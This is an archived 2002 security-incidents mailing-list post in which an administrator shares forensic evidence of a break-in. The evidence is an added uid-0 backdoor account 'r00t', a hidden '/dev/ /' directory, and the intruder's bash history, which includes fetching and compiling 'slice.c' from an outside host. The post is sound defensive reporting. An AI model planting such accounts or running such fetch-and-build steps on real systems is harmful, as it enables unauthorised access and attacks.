Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

watching them -after the fact

From: Alvin Oga <alvin.sec () Mail Linux-Consulting com>
Date: Sun, 24 Mar 2002 23:11:37 -0800 (PST)

hi ya

this machine does NOT have su, wget, gcc installed
so they couldn't do much ???

they also created an empty dir:  "/dev/ /"
        ( yes... a space as its filename )

c ya
alvin


cat /etc/passwd
        ...

-->>        karlin::1001:1001::/tmp:/bin/bash
-->>        r00t::0:0::/tmp:/bin/bash


cat /tmp/.bash_history
...
su r00t
su r00t
sudo
suidperl 
uname -a
w
uname -a
exit
su r00t
uname -a
w
exit
w
su r00t
exit
w
su r00t
exit
wget turma85.hypermart.net/slice.c
gcc -o sl slice.c 
exit
su r00t
w
exit
#
# end of history


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: